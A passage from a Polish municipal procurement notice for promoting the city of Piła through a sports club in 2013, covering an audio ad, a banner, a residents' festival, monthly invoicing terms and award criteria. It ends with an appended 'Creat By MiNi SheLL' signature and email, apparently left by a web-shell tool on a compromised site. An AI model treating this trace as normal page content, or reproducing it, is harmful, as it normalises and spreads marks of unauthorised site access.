6. Przygotowanie i emisję reklamy dźwiękowej  miasta w przerwach meczów  o treści 
(wraz z podkładem muzycznym):      Piła - Aktywne miasto - zapraszamy na imprezy organizowane przez Urząd     Miasta Piły -  informacje na stronie www.pila.pl
7. Wykonanie 1 szt. roll-up ze znakiem promocyjnym miasta, zgodnie z załącznikiem nr 2.
8. Zorganizowanie jednej otwartej całodniowej  imprezy sportowo-rekreacyjnej  w formie festynu dla mieszkańców miasta pod hasłem  Piła na plastronie,
z następującym programem:
        - popularyzacja określonej w zadaniu dyscypliny sportu,
        - spotkanie z drużyną,
   - akcja  Otwarte drzwi dla mieszkańców miasta - wizyta w siedzibie klubu lub w obiekcie sportowym, gdzie są rozgrywane są zawody sportowe.
9. Inne warunki realizacji zadania
dopuszcza się płatności częściowe,
wysokość całkowitego wynagrodzenia za realizację przedmiotu umowy ustala się jako sumę wynagrodzeń miesięcznych brutto w poszczególnych miesiącach realizacji zadania,
wynagrodzenie  za wykonanie przedmiotu umowy zostanie zapłacone Wykonawcy raz 
w miesiącu, zgodnie z przeprowadzoną promocją miasta w miesiącu poprzedzającym wystawienie faktury, w terminie 14 dni od daty przyjęcia przez Zamawiającego poprawnie wystawionej faktury VAT z dołączonym sprawozdaniem z przeprowadzonej promocji, które zawiera:
informację o odbytych spotkaniach, miejscach i terminach zawodów sportowych, ilości kibiców, 
dokumentację fotograficzną,
materiały reklamowe (plakaty, bilety, programy zawodów sportowych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.62.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com